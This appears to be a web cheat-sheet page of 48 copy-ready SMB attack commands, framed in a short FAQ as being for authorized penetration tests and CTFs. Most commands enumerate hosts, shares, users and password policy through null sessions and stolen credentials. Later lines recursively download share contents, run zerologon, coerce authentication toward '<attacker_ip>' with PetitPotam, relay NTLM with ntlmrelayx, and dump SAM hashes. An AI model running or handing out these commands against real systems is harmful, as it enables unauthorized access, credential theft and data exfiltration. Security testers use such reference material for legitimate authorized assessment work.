$loading...
SMB enumeration commands for null sessions, share hunting, and user/group discovery using smbclient, enum4linux-ng, rpcclient, nmap, and crackmapexec/netexec. (48 payloads)
nmap -p 139,445 --open -oG smb.gnmap 10.10.10.0/24nmap -p445 --script smb-protocols 10.10.10.10nmap -p445 --script smb-os-discovery 10.10.10.10nmap -p445 --script smb-security-mode,smb2-security-mode 10.10.10.10nxc smb 10.10.10.0/24crackmapexec smb 10.10.10.10 --gen-relay-list relay_targets.txtnbtscan -r 10.10.10.0/24smbclient -L //10.10.10.10 -N --option='client min protocol=NT1'smbclient -L //10.10.10.10 -Nsmbclient -L //10.10.10.10 -U 'guest%'nxc smb 10.10.10.10 -u '' -p ''nxc smb 10.10.10.10 -u 'a' -p ''rpcclient -U '' -N 10.10.10.10nxc smb 10.10.10.10 -u '' -p '' --sharesenum4linux-ng -A -u '' -p '' 10.10.10.10smbmap -H 10.10.10.10 -u null -p ''enum4linux-ng -A -u user -p 'Password1' 10.10.10.10nxc smb 10.10.10.10 -u user -p 'Password1' --sharesnxc smb 10.10.10.10 -u user -p 'Password1' --usersnxc smb 10.10.10.10 -u user -p 'Password1' --groupsnxc smb 10.10.10.10 -u user -p 'Password1' --pass-polnxc smb 10.10.10.10 -u user -p 'Password1' --loggedon-usersnxc smb 10.10.10.10 -u user -H <NThash> --sharessmbmap -H 10.10.10.10 -u user -p 'Password1' -R --depth 5rpcclient -U '' -N 10.10.10.10 -c 'enumdomusers'rpcclient -U '' -N 10.10.10.10 -c 'enumdomgroups'rpcclient -U '' -N 10.10.10.10 -c 'querygroupmem 0x200'rpcclient -U '' -N 10.10.10.10 -c 'queryuser 0x1f4'nxc smb 10.10.10.10 -u guest -p '' --rid-brute 10000lookupsid.py [email protected] -no-passrpcclient -U '' -N 10.10.10.10 -c 'lsaquery'rpcclient -U '' -N 10.10.10.10 -c 'getdompwinfo'smbclient //10.10.10.10/Share -U 'user%Password1'smbclient //10.10.10.10/Share -N -c 'recurse ON; ls'smbclient //10.10.10.10/Share -N -c 'prompt OFF; recurse ON; mget *'nxc smb 10.10.10.10 -u user -p 'Password1' -M spider_plusnxc smb 10.10.10.10 -u user -p 'Password1' -M spider_plus -o DOWNLOAD_FLAG=Truesmbmap -H 10.10.10.10 -u user -p 'Password1' -A '\.(conf|ini|xml|txt)$'smbmap -H 10.10.10.10 -u user -p 'Password1' --download 'Share\flag.txt'mount -t cifs //10.10.10.10/Share /mnt/smb -o username=user,password=Password1nmap -p445 --script smb-vuln-ms17-010 10.10.10.10nxc smb 10.10.10.10 -u user -p 'Password1' -M zerologonnxc smb 10.10.10.0/24 -u user -p 'Password1' -M coerce_plusPetitPotam.py -u user -p 'Password1' -d domain.com <attacker_ip> <DC_ip>ntlmrelayx.py -tf relay_targets.txt -smb2supportntlmrelayx.py -t ldap://<DC_ip> --delegate-access -smb2supportnxc smb 10.10.10.10 -u user -p 'Password1' --samnxc smb 10.10.10.10 -u user -p 'Password1' --shares --filter-shares READ WRITELevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 48 SMB Enum payloads for testing SMB Enumeration vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or use the Network Recon & Exploitation to apply them interactively. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all SMB Enum payloads are completely free, with no account required. Everything runs in your browser.